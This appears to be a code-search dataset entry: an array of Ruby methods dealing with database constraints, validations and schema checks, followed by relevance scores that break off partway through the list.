"def check_constraints(table)\n m = output_identifier_meth\n\n hash = {}\n _check_constraints_ds.where_each(:conrelid=>regclass_oid(table)) do |row|\n constraint = m.call(row[:constraint])\n entry = hash[constraint] ||= {:definition=>row[:definition], :columns=>[]}\n entry[:columns] << m.call(row[:column]) if row[:column]\n end\n \n hash\n end",
"def table_constraints(table, constraint_type, options={})\n\t \tds, result = metadata_dataset, []\n\t\t\t\toutm = sql_ident_to_sym_proc ds\n\t \tschema, table = ds.schema_and_table(table).map{|k| k.to_s.send(ds.identifier_input_method) if k} \n\t \tx_cons = schema.nil? ? 'user_cons' : 'all_cons'\n\t \t\n\t \t# Build the dataset and apply filters for introspection of constraints.\n\t\t\t\t# Also allows the caller to customize the dataset.\n\t \tds = ds.select(:c__constraint_name, :c__table_name, :c__rely, :c__status, :c__validated, :cc__column_name).\n\t\t\t\t from(:\"#{x_cons}traints___c\").\n\t\t\t\t join(:\"#{x_cons}_columns___cc\", [ [:owner,:owner], [:constraint_name,:constraint_name] ]).\n\t\t\t\t\t\t\t\twhere((options[:table_name_column]||:c__table_name)=>table, :c__constraint_type=>constraint_type).\n\t order(:table_name, :status.desc, :constraint_name, :cc__position)\n\t\t\t\tds = ds.where :c__owner => schema unless schema.nil?\n\t\t\t\tds = ds.where :c__status => (options[:enabled] ? 'ENABLED' : 'DISABLED') unless options[:enabled].nil?\n\t\t\t\tds = ds.where :c__validated => (options[:validated] ? 'VALIDATED' : 'NOT VALIDATED') unless options[:validated].nil?\n\t\t\t\tif constraint_type == 'R'\n\t ds = ds.select_more(:c__r_constraint_name, :t__table_name.as(:r_table_name)).\n\t\t\t\t\t join(:\"#{x_cons}traints___t\", [ [:owner,:c__r_owner], [:constraint_name,:c__r_constraint_name] ]).\n\t where(:t__constraint_type=>'P')\n\t\t\t\telse\n\t ds = ds.select_more(:c__index_name)\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\t# Return the table constraints as a hash of subhashes, including a column list.\n\t\t\t\thash = {}\n\t\t\t\tds.each do |row|\n\t\t\t\t\tkey = outm[row[:constraint_name]]\n\t\t\t\t\tunless subhash = hash[key]\n\t\t\t\t\t\tsubhash = hash[key] = {\n\t\t\t\t\t\t\t:rely=>(row[:rely]=='RELY'), :enable=>(row[:status]=='ENABLED'),\n\t\t\t\t\t\t\t:validate=>(row[:validated]=='VALIDATED'), :columns=>[]\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif row.include? :r_constraint_name\n\t\t\t\t\t\t\tsubhash[:ref_constraint] = outm[row[:r_constraint_name]]\n\t\t\t\t\t\t\tif options[:table_name_column]==:t__table_name\n\t\t\t\t\t\t\tthen subhash[:table] = outm[row[:table_name]]\n\t\t\t\t\t\t\telse subhash[:ref_table] = outm[row[:r_table_name]]\n\t\t\t\t\t\t\tend\n\t\t\t\t\t\telsif row.include? :index_name\n\t\t\t\t\t\t\tsubhash[:using_index] = outm[row[:index_name]]\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\t\tsubhash[:columns] << outm[row[:column_name]]\n\t\t\t\tend\n\t\t\t\thash\n\t \tend",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n sql << \"CHECK #{filter_expr(constraint[:check])}\"\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = String.new\n sql << \"CONSTRAINT #{quote_identifier(constraint[:name])} \" if constraint[:name] \n case constraint[:type]\n when :check\n check = constraint[:check]\n check = check.first if check.is_a?(Array) && check.length == 1\n check = filter_expr(check)\n check = \"(#{check})\" unless check[0..0] == '(' && check[-1..-1] == ')'\n sql << \"CHECK #{check}\"\n when :primary_key\n sql << \"#{primary_key_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << column_references_table_constraint_sql(constraint.merge(:deferrable=>nil))\n when :unique\n sql << \"#{unique_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n else\n raise Error, \"Invalid constraint type #{constraint[:type]}, should be :check, :primary_key, :foreign_key, or :unique\"\n end\n constraint_deferrable_sql_append(sql, constraint[:deferrable])\n sql\n end",
"def build_constraints\n Schema::Logical::Constraint.new\n end",
"def get_validate data\n data.values.flatten\n end",
"def constraints; end",
"def constraints; end",
"def constraints; end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def check_constraints\n case self.recordable\n when ExtractionsExtractionFormsProjectsSectionsQuestionRowColumnField\n case self.recordable.question_row_column_field.question_row_column.question_row_column_type.name\n when 'text'\n min_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_length).to_i\n max_length = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_length).to_i\n if self.persisted? && self.name.length > 0 && (self.name.length < min_length || self.name.length > max_length)\n errors.add(:length, \"must be between #{ min_length.to_s } and #{ max_length.to_s }\")\n end\n when 'numeric'\n # First check that we aren't trying to validate any of the ~, <, >, ≤, ≥ special characters.\n if self.recordable.question_row_column_field.question_row_column.question_row_column_fields.second == self.recordable.question_row_column_field\n unless (self.name =~ /\\A[-+]?[0-9]*\\.?[0-9]+\\z/) || self.name != ''\n errors.add(:value, 'Must be numeric')\n end\n\n min_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:min_value).to_i\n max_value = self.recordable.question_row_column_field.question_row_column.field_validation_value_for(:max_value).to_i\n if self.persisted? && (self.name.to_i < min_value || self.name.to_i > max_value)\n errors.add(:value, \"must be numeric and between #{ min_value.to_s } and #{ max_value.to_s }\")\n end\n end\n end\n end\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def check_constraint(*partition_key_values)\n return collect_first(*partition_key_values, &:check_constraint)\n end",
"def constraint_params\n params.require(:constraint).permit(:title, :decision_id)\n end",
"def dump_constraints\n cs = constraints.map do |c|\n c = c.dup\n type = c.delete(:type)\n case type\n when :check\n raise(Error, \"can't dump check/constraint specified with Proc\") if c[:check].is_a?(Proc)\n name = c.delete(:name)\n if !name and c[:check].length == 1 and c[:check].first.is_a?(Hash)\n \"check #{c[:check].first.inspect[1...-1]}\"\n else\n \"#{name ? \"constraint #{name.inspect},\" : 'check'} #{c[:check].map{|x| x.inspect}.join(', ')}\"\n end\n else\n cols = c.delete(:columns)\n \"#{type} #{cols.inspect}#{opts_inspect(c)}\"\n end\n end\n cs.join(\"\\n\")\n end",
"def hdf_descriptions(config_rule)\n [\n {\n label: 'check',\n data: check_text(config_rule)\n },\n ]\n end",
"def validate_constraint(table, name)\n current_instructions << Instructions::ValidateConstraint.new(\n table: table,\n name: name,\n )\n end",
"def dump_constraints\n cs = constraints.map do |c|\n c = c.dup\n type = c.delete(:type)\n case type\n when :check\n raise(Error, \"can't dump check/constraint specified with Proc\") if c[:check].is_a?(Proc)\n name = c.delete(:name)\n if !name and c[:check].length == 1 and c[:check].first.is_a?(Hash)\n \"check #{c[:check].first.inspect[1...-1]}\"\n else\n \"#{name ? \"constraint #{name.inspect},\" : 'check'} #{c[:check].map(&:inspect).join(', ')}\"\n end\n when :foreign_key\n c.delete(:on_delete) if c[:on_delete] == :no_action\n c.delete(:on_update) if c[:on_update] == :no_action\n c.delete(:deferrable) unless c[:deferrable]\n cols = c.delete(:columns)\n table = c.delete(:table)\n \"#{type} #{cols.inspect}, #{table.inspect}#{opts_inspect(c)}\"\n else\n cols = c.delete(:columns)\n \"#{type} #{cols.inspect}#{opts_inspect(c)}\"\n end\n end\n cs.join(\"\\n\")\n end",
"def add_check_constraint(table, name, check)\n current_instructions << Instructions::AddCheckConstraint.new(\n table: table,\n name: name,\n check: check,\n )\n end",
"def validate\n refs_errors = validate_references\n labels_errors = datasets.reduce([]) { |a, e| a.concat(e.validate) }\n refs_errors.concat(labels_errors)\n end",
"def check_constraint_params\n\t\tparams.require(:constraint).permit(:travel_mean, :subject, :operator, :value)\n\tend",
"def supports_check_constraints?\n false\n end",
"def contraints(p_module_object)\n\t\tconstraints = []\n\t\tmin = self.find_property('MIN')\n\t\tif ! min.nil?\n\t\t\tconstraints << ConstraintChecker::Constraints::Min.new(p_module_object, min.value)\n\t\tend\n\t\tmax = self.find_property('MAX')\n\t\tif !max.nil?\n\t\t\tconstraints << ConstraintChecker::Constraints::Max.new(p_module_object, max.value)\n\t\tend\n\t\tconstraints \n\n\tend",
"def confidence_avail_db\n\n case hgt_type\n when :regular then [1]\n when :all then [1,0]\n else raise AssertError.new \"\"\n end\n\n end",
"def validated_data\n @schema.validate(@data)\n end",
"def bulk_check_sql\n @bulk_check_sql.nil? ? \"SELECT * FROM #{self.table.entity.sql.qualified_table_name} WHERE NOT (#{self.constraint_sql})\" : @bulk_check_sql\n end",
"def bulk_check_sql\n @bulk_check_sql.nil? ? \"SELECT * FROM #{self.table.entity.sql.qualified_table_name} WHERE NOT (#{self.constraint_sql})\" : @bulk_check_sql\n end",
"def validate_constraint(name)\n @operations << {:op => :validate_constraint, :name => name}\n end",
"def descriptions\n\t\treturn self.constraints.each_with_object({}) do |(field,constraint), hash|\n\t\t\thash[ field ] = constraint.description\n\t\tend\n\tend",
"def data_to_ruleset \n\n\t\ttemp_array = []\n\t\trule_name = self.fctr_code.blank? ? (\"rule_\" + self.id.to_s) : self.fctr_code + \": \"\n\n\t\tif not self.where_country.blank?\n\t\t\ttemp_array << (\"c_where_country = \" + self.where_country.subfctr_name)\n\t\tend\n\n\t\tif not self.where_zone.blank?\n\t\t\ttemp_array << (\"c_where_zone = \" + self.where_zone.subfctr_name)\n\t\tend\n\n\t\tif not self.where_network.blank?\n\t\t\ttemp_array << (\"c_where_network = \" + self.where_network.subfctr_name)\n\t\tend\n\n\t\tif not self.where_custom.blank?\n\t\t\ttemp_array << (\"c_where_custom = \" + self.where_custom.subfctr_name)\n\t\tend\n\n\t\tif temp_array.size > 0\n\t\t\treturn rule_name + temp_array.join(\", \")\n\t\telse\n\t\t\treturn \"\"\n\t\tend\n\tend",
"def lint_dataset_predicate\n return if gateway_instance.respond_to? :dataset?\n\n complain \"#{gateway_instance} must respond to dataset?\"\n end",
"def propertiesForConstraint\n\tend",
"def validate\n super\n rescue Sudoku::Constraint::ConstraintError => e\n raise ConstraintError, e.message + \" in a column\"\n end",
"def condition_values\n @rule_details.conditions[0].values\n end",
"def create_table_with_constraints(*_)\n raise <<~EOM\n #create_table_with_constraints is not supported anymore - use #create_table instead, for example:\n\n create_table :db_guides do |t|\n t.bigint :stars, default: 0, null: false\n t.text :title, limit: 128\n t.text :notes, limit: 1024\n\n t.check_constraint 'stars > 1000', name: 'so_many_stars'\n end\n\n See https://docs.gitlab.com/ee/development/database/strings_and_the_text_data_type.html\n EOM\n end",
"def required_data() [] end",
"def check_budget\n checks = []\n\n # Internal consistency\n checks << check_equal(\"Transferencias internas ingresos = gastos\", \n beautify(@income[:consolidado][:transferencias]),\n beautify(@expenses[:consolidado][:transferencias]) )\n\n # Expenses\n checks.concat check_expenses('R_6_2_801_1_3', \"Estado\", :estado)\n checks.concat check_expenses('R_6_2_802_1_3', \"Organismos Autónomos\", :ooaa)\n checks.concat check_expenses('R_6_2_803_1_3', \"Agencias estatales\", :agencias)\n checks.concat check_expenses('R_6_2_804_1_3', \"Otros organismos\", :otros)\n checks.concat check_expenses('R_6_2_805_1_3', \"Seguridad Social\", :seg_social)\n\n # Income\n checks.concat check_income('R_6_1_101_1_5_1', \"Estado\", :estado)\n checks.concat check_income('R_6_1_102_1_4_1', \"Organismos Autónomos\", :ooaa)\n checks.concat check_income('R_6_1_103_1_4_1', \"Agencias estatales\", :agencias)\n checks.concat check_income('R_6_1_104_1_4_1', \"Otros organismos\", :otros)\n checks.concat check_income('R_6_1_105_1_5_1', \"Seguridad Social\", :seg_social)\n\n # Return results\n checks.join(\"\\n\")\n end",
"def coerce_constraint_definition(defn)\n defn = coerce_symbolized_hash(defn)\n defn[:type] = coerce_name(defn[:type])\n \n case type = defn[:type]\n when :primary_key, :candidate_key\n has_exactly_hash_keys!(defn, :type, :attributes)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n when :foreign_key\n if defn.key?(:key)\n has_exactly_hash_keys!(defn, :type, :attributes, :references, :key)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n defn[:key] = coerce_name(defn[:key])\n else\n has_exactly_hash_keys!(defn, :type, :attributes, :references)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n end\n else\n invalid!(\"unknown constraint type #{type}\")\n end\n defn\n end",
"def setup_auto_validations\n not_null_cols, explicit_not_null_cols = db_schema.select{|col, sch| sch[:allow_null] == false}.partition{|col, sch| sch[:default].nil?}.map{|cs| cs.map{|col, sch| col}}\n @auto_validate_not_null_columns = not_null_cols - Array(primary_key)\n explicit_not_null_cols += Array(primary_key)\n @auto_validate_explicit_not_null_columns = explicit_not_null_cols.uniq\n @auto_validate_max_length_columns = db_schema.select{|col, sch| sch[:type] == :string && sch[:max_length].is_a?(Integer)}.map{|col, sch| [col, sch[:max_length]]}\n table = dataset.first_source_table\n @auto_validate_unique_columns = if db.supports_index_parsing? && [Symbol, SQL::QualifiedIdentifier, SQL::Identifier, String].any?{|c| table.is_a?(c)}\n db.indexes(table).select{|name, idx| idx[:unique] == true}.map{|name, idx| idx[:columns].length == 1 ? idx[:columns].first : idx[:columns]}\n else\n []\n end\n end",
"def __foreign_key_list_ds(reverse)\n if reverse\n ctable = Sequel[:att2]\n cclass = Sequel[:cl2]\n rtable = Sequel[:att]\n rclass = Sequel[:cl]\n else\n ctable = Sequel[:att]\n cclass = Sequel[:cl]\n rtable = Sequel[:att2]\n rclass = Sequel[:cl2]\n end\n\n if server_version >= 90500\n cpos = Sequel.expr{array_position(co[:conkey], ctable[:attnum])}\n rpos = Sequel.expr{array_position(co[:confkey], rtable[:attnum])}\n # :nocov:\n else\n range = 0...32\n cpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:conkey], [x]), x]}, 32, ctable[:attnum])}\n rpos = Sequel.expr{SQL::CaseExpression.new(range.map{|x| [SQL::Subscript.new(co[:confkey], [x]), x]}, 32, rtable[:attnum])}\n # :nocov:\n end\n\n ds = metadata_dataset.\n from{pg_constraint.as(:co)}.\n join(Sequel[:pg_class].as(cclass), :oid=>:conrelid).\n join(Sequel[:pg_attribute].as(ctable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n join(Sequel[:pg_class].as(rclass), :oid=>Sequel[:co][:confrelid]).\n join(Sequel[:pg_attribute].as(rtable), :attrelid=>:oid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:confkey])).\n join(Sequel[:pg_namespace].as(:nsp), :oid=>Sequel[:cl2][:relnamespace]).\n order{[co[:conname], cpos]}.\n where{{\n cl[:relkind]=>%w'r p',\n co[:contype]=>'f',\n cpos=>rpos\n }}.\n select{[\n co[:conname].as(:name),\n ctable[:attname].as(:column),\n co[:confupdtype].as(:on_update),\n co[:confdeltype].as(:on_delete),\n cl2[:relname].as(:table),\n rtable[:attname].as(:refcolumn),\n SQL::BooleanExpression.new(:AND, co[:condeferrable], co[:condeferred]).as(:deferrable),\n nsp[:nspname].as(:schema)\n ]}\n\n if reverse\n ds = ds.order_append(Sequel[:nsp][:nspname], Sequel[:cl2][:relname])\n end\n\n ds\n end",
"def constraints\n super\n end",
"def check_params\n params.require(:check).permit(:category, :name, :condition_query, :condition_operator, :condition_aggregator, :condition_value, :severity, :interval, :is_locked, :team_id, :datasource_id, :documentation_url, :index)\n end",
"def to_dump(opts={})\n dump = \"\"\n dump << \"add_column_check_constraint #{table_name.to_s}, #{column_name.to_s}\" unless opts[:inline]\n dump << \", check: #{check.inspect}\"\n dump << \"\\n\"\n dump\n end",
"def constraints(_)\n nil\n end",
"def saint_saens; end",
"def constraint_by_name(name)\n self[name]\n end",
"def schema_ds_dataset\n schema_utility_dataset\n end",
"def odk_constraint\n exps = []\n exps << \". #{minstrictly ? '>' : '>='} #{casted_minimum}\" if minimum\n exps << \". #{maxstrictly ? '<' : '<='} #{casted_maximum}\" if maximum\n exps.empty? ? nil : \"(\" + exps.join(\" and \") + \")\"\n end",
"def valid_validation_parameter\n %i[\n validate\n criteria\n value\n source\n minimum\n maximum\n ignore_blank\n dropdown\n show_input\n input_title\n input_message\n show_error\n error_title\n error_message\n error_type\n other_cells\n ]\n end",
"def read_residual_mandatory_constraints\n trace :orm, \"Processing non-absorbed mandatory constraints\" do\n @mandatory_constraints_by_rs.each { |role_sequence, x|\n id = x['id']\n # Create a simply-mandatory PresenceConstraint for each mandatory constraint\n name = x[\"Name\"] || ''\n name = nil if name.size == 0\n #puts \"Residual Mandatory #{name}: #{role_sequence.to_s}\"\n\n if (players = role_sequence.all_role_ref.map{|rr| rr.role.object_type}).uniq.size > 1\n join_over, = *ActiveFacts::Metamodel.plays_over(role_sequence.all_role_ref.map{|rr| rr.role}, :proximate)\n raise \"Mandatory join constraint #{name} has incompatible players #{players.map{|o| o.name}.inspect}\" unless join_over\n if players.detect{|p| p != join_over}\n trace :query, \"subtyping step simple mandatory constraint #{name} over #{join_over.name}\"\n players.each_with_index do |player, i|\n next if player != join_over\n # REVISIT: We don't need to make a subtyping step here (from join_over to player)\n end\n end\n end\n\n pc = @constellation.PresenceConstraint(id_of(x))\n pc.vocabulary = @vocabulary\n pc.name = name\n pc.role_sequence = role_sequence\n pc.is_mandatory = true\n pc.min_frequency = 1 \n pc.max_frequency = nil\n pc.is_preferred_identifier = false\n\n (@constraints_by_rs[role_sequence] ||= []) << pc\n @by_id[id] = pc\n }\n end\n end",
"def dataset_properties_required\n @dataset_properties_required ||= %i[\n creator\n title\n publisher\n date_published\n resource_type_general\n resource_type\n ]\n end",
"def check_parameter_constraints\n check_constraints_for_a if (@repository.parameters[:all])\n check_constraints_for_c if (@repository.parameters[:coord])\n check_constraints_for_d if (@repository.parameters[:delta])\n check_constraints_for_r if (@repository.parameters[:range])\n\n # check mandatory parameter combination\n check_parameter_occurrence\n \n # check mandatory file parameter\n check_mandatory_parameter(:file)\n end",
"def validate_data\n inputs = Set.new(node.in_slots.map(&:carrier))\n effs = Set.new(dependencies)\n\n unless inputs.subset?(effs)\n # One or more efficiencies are missing.\n errors.add(:base, error_msg(:efficiencies, inputs, effs))\n end\n\n unless effs.subset?(inputs)\n # One or more input shares are missing.\n errors.add(:base, error_msg(:inputs, effs, inputs))\n end\n end",
"def constraint_listeners\n @constraint_listeners\n end",
"def find_dataset_errors(dataset:)\n errs = []\n return errs unless dataset.present? && !dataset.valid?\n\n errs << dataset.errors.full_messages\n errs = errs.flatten.uniq\n errs.any? ? [\"Dataset : #{errs}\"] : []\n end",
"def constraint\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 8 )\n return_value = ConstraintReturnValue.new\n\n # $rule.start = the first token seen before matching\n return_value.start = @input.look\n\n root_0 = nil\n string_literal31 = nil\n\n tree_for_string_literal31 = nil\n\n begin\n root_0 = @adaptor.create_flat_list\n\n\n # at line 41:5: 'not null'\n string_literal31 = match( NOT_NULL, TOKENS_FOLLOWING_NOT_NULL_IN_constraint_239 )\n\n tree_for_string_literal31 = @adaptor.create_with_payload( string_literal31 )\n @adaptor.add_child( root_0, tree_for_string_literal31 )\n\n # - - - - - - - rule clean up - - - - - - - -\n return_value.stop = @input.look( -1 )\n\n\n return_value.tree = @adaptor.rule_post_processing( root_0 )\n @adaptor.set_token_boundaries( return_value.tree, return_value.start, return_value.stop )\n\n rescue ANTLR3::Error::RecognitionError => re\n report_error(re)\n recover(re)\n return_value.tree = @adaptor.create_error_node( @input, return_value.start, @input.look(-1), re )\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 8 )\n\n end\n \n return return_value\n end",
"def check_required_fields(data)\r\n @field_names[1..-1].each do |f|\r\n raise(ArgumentError,\r\n 'A value for this field is required: %s' % f) if \\\r\n @field_requireds[@field_names.index(f)] and data[f].nil? \r\n end\r\n end",
"def odk_constraint\n exps = []\n exps << \". #{minstrictly ? '>' : '>='} #{minimum}\" if minimum\n exps << \". #{maxstrictly ? '<' : '<='} #{maximum}\" if maximum\n \"(\" + exps.join(\" and \") + \")\"\n end",
"def marshall_listed_constraints() \n idx = 0\n constraints_with_ids = []\n for constraint in session[:constraints]\n # record the original index in the constraints array, use this as an id\n constraints_with_ids << { :id => idx, :constraint => constraint } \n idx = idx + 1\n end\n\n return constraints_with_ids # at the moment, we are showing all constraints.\n end",
"def validate_check(check)\n validate_check_name(check)\n validate_check_execution(check)\n validate_check_source(check) if check[:source]\n validate_check_scheduling(check)\n validate_check_proxy_requests(check) if check[:proxy_requests]\n validate_check_handling(check)\n validate_check_ttl(check) if check[:ttl]\n validate_check_aggregate(check)\n validate_check_flap_detection(check)\n validate_check_hooks(check) if check[:hooks]\n validate_check_truncate_output(check)\n validate_check_subdue(check) if check[:subdue]\n end",
"def validate_references\n if datasets.count == 1\n []\n else\n x = datasets.reduce([]) { |a, e| e.anchor? ? a << [e.name, e.anchor[:name]] : a }\n refs = datasets.reduce([]) do |a, e|\n a.concat(e.references)\n end\n refs.reduce([]) do |a, e|\n x.include?([e[:dataset], e[:reference]]) ? a : a.concat([e])\n end\n end\n end",
"def data_attributes\n @schema.schema.select {|k,_| k.to_s.start_with?('data_') or k.to_s.start_with?('data-')}.inject({}) {|col,(k,v)| col[k[5..-1].to_sym]=v;col}\n end",
"def all_constraint\n (\n Array(role_value_constraint) +\n all_role_ref.to_a.flat_map do |rr|\n rr.role_sequence.all_presence_constraint.to_a +\n rr.role_sequence.all_subset_constraint_as_superset_role_sequence +\n rr.role_sequence.all_subset_constraint_as_subset_role_sequence +\n rr.role_sequence.all_set_comparison_roles.map(&:set_comparison_constraint)\n end +\n all_ring_constraint.to_a +\n all_ring_constraint_as_other_role.to_a\n ).uniq\n end",
"def lint\n ret = []\n ret << :cve if self.cve.nil?\n ret << :osvdb if @osvdb.nil?\n ret << :cvss if self.cvss.nil? || self.cvss.empty? || self.cvss == \"not assigned\"\n ret << :severity if self.severity == \"unknown\"\n ret << :priority if self.priority == \"unknown\"\n\n ret\n end",
"def check_constraint_on_finalize?\n # Don't bother checking if sql_analysis is enabled as the `spCheckConstraints` will be invoked\n @check_constraint_on_finalize.nil? ? !self.table.entity.data_module.sql_analysis? : @check_constraint_on_finalize\n end",
"def check_constraint_on_finalize?\n # Don't bother checking if sql_analysis is enabled as the `spCheckConstraints` will be invoked\n @check_constraint_on_finalize.nil? ? !self.table.entity.data_module.sql_analysis? : @check_constraint_on_finalize\n end",
"def check_constraint_on_finalize?\n # Don't bother checking if sql_analysis is enabled as the `spCheckConstraints` will be invoked\n @check_constraint_on_finalize.nil? ? !self.table.entity.data_module.sql_analysis? : @check_constraint_on_finalize\n end",
"def requirements\n []\n end",
"def constraint_target\n target\n end",
"def get_design_checks\n\n design_checks = self.design_checks # DesignCheck.find(:all, :conditions => \"audit_id=#{self.id}\")\n \n self.checklist.each_check do |check|\n design_check = design_checks.detect { |dc| dc.check_id == check.id }\n check.design_check = design_check if design_check\n end\n \n end",
"def check_all_foreign_keys_valid!\n end",
"def to_constr\n @hash.map{|id, ty|\n Constraint.new(Type::TyVar[id], ty)\n }\n end",
"def all_constraints(table_filter=nil)\n constraints = tables.values.map(&:constraints).flatten\n constraints.delete_if{|c|!table_filter.include?(c.table.name)} if table_filter\n constraints\n end",
"def add_check(table_name, condition, options)\n name = options.fetch(:name) { raise 'add_check, :name option required' }\n\n execute <<-SQL\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_column_name(name)}\n CHECK (#{condition})\n SQL\n end",
"def expected_columns; end",
"def to_constraint(arr)\n \"[#{arr[0]}, #{arr[1]}]\"\n end",
"def column_names\n\t\t@validated_gets.map{|f| f[:external]} + [\"usd_2009\", \"usd_current\", \"count\", \"min_year\", \"max_year\"]\n\tend",
"def validations\n []\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def constraint_to_a(name, constraint)\n op, vers = constraint.split(\" \")\n [name, vers, op]\n end",
"def required_checks(xml, checks)\n required_checks = [*checks].map { |c| Util.underscore(c).to_sym }\n xml.ChecksRequired do\n Constants::CHECKS.each do |check|\n included = required_checks.include?(Util.underscore(check).to_sym)\n xml.send(check, included ? \"yes\" : \"no\")\n end\n end\n end",
"def requirements; end",
"def requirements; end",
"def requirements; end",
"def requirements; end",
"def checks\r\n checks = []\r\n jobs.each do |job|\r\n checks << job.check_informations.first\r\n end\r\n checks = checks.flatten.compact\r\n end",
"def demand_array\n demands.collect do |demand|\n constraint = demand.locked_version || demand.version_constraint\n [demand.name, constraint]\n end\n end",
"def index\n @constraints = Constraint.all\n end",
"def column\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 6 )\n return_value = ColumnReturnValue.new\n\n # $rule.start = the first token seen before matching\n return_value.start = @input.look\n\n root_0 = nil\n __ID22__ = nil\n datatype23 = nil\n constraint24 = nil\n\n tree_for_ID22 = nil\n\n begin\n root_0 = @adaptor.create_flat_list\n\n\n # at line 35:5: ID datatype ( constraint )*\n __ID22__ = match( ID, TOKENS_FOLLOWING_ID_IN_column_196 )\n\n tree_for_ID22 = @adaptor.create_with_payload( __ID22__ )\n root_0 = @adaptor.become_root( tree_for_ID22, root_0 )\n\n @state.following.push( TOKENS_FOLLOWING_datatype_IN_column_199 )\n datatype23 = datatype\n @state.following.pop\n @adaptor.add_child( root_0, datatype23.tree )\n # at line 35:18: ( constraint )*\n while true # decision 6\n alt_6 = 2\n look_6_0 = @input.peek( 1 )\n\n if ( look_6_0 == NOT_NULL )\n alt_6 = 1\n\n end\n case alt_6\n when 1\n # at line 35:18: constraint\n @state.following.push( TOKENS_FOLLOWING_constraint_IN_column_201 )\n constraint24 = constraint\n @state.following.pop\n @adaptor.add_child( root_0, constraint24.tree )\n\n else\n break # out of loop for decision 6\n end\n end # loop for decision 6\n # - - - - - - - rule clean up - - - - - - - -\n return_value.stop = @input.look( -1 )\n\n\n return_value.tree = @adaptor.rule_post_processing( root_0 )\n @adaptor.set_token_boundaries( return_value.tree, return_value.start, return_value.stop )\n\n rescue ANTLR3::Error::RecognitionError => re\n report_error(re)\n recover(re)\n return_value.tree = @adaptor.create_error_node( @input, return_value.start, @input.look(-1), re )\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 6 )\n\n end\n \n return return_value\n end",
"def set_validations\n # TODO: Move below this line to the partition class itself\n @keys.each do |key|\n case key.type\n when :continuous\n partition_class.validates_uniqueness_of(\"#{key.column}_begin\", :scope => @keys.remaining_columns(\"#{key.column}_begin\"))\n partition_class.validates_uniqueness_of(\"#{key.column}_end\", :scope => @keys.remaining_columns(\"#{key.column}_end\"))\n when :discrete\n partition_class.validates_uniqueness_of(key.column, :scope => @keys.remaining_columns(key.column))\n end\n end\n end",
"def check_data_validation\r\n if @tx_interest.text.to_f > 0 and \r\n @tx_interest.text.to_f < 0.1 and\r\n @tx_amount.text.to_i >= 1000 and\r\n @tx_years.text.to_i >= 1 then\r\n tf = true\r\n else\r\n tf = false\r\n end\r\n return tf\r\n end",
"def create_checklist\n self.checklist.each_check do |check|\n DesignCheck.add(self, check) if check.belongs_to?(self.design)\n end\n end",
"def dataset_need_primary_key?\n true\n end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def columns\n orig_dataset.columns\n end",
"def check_for_requirements; end",
"def attribute_constraints(mt_id = nil)\n PatternElement.where(:pattern_id => self.id, monitoring_task_id: [nil, mt_id], type: \"AttributeConstraint\")\n end",
"def conditions\n c = [DateCondition,SqlCondition,AnyCondition,IpRangeCondition,FilterCondition]\n return [] unless self.yaml_declaration\n y = YAML.parse(self.yaml_declaration)\n return [] unless y\n y.transform \n end",
"def to_s\n constraints.to_sentence\n end"
] |
[
"0.6155641",
"0.60944134",
"0.5996631",
"0.59153426",
"0.58677566",
"0.57724947",
"0.57413626",
"0.57413626",
"0.57413626",
"0.569063",
"0.5663217",
"0.5560472",
"0.5520541",
"0.5471246",
"0.5470642",
"0.54595786",
"0.54445577",
"0.54018646",
"0.5377396",
"0.5370092",
"0.5359885",
"0.5358358",
"0.5328339",
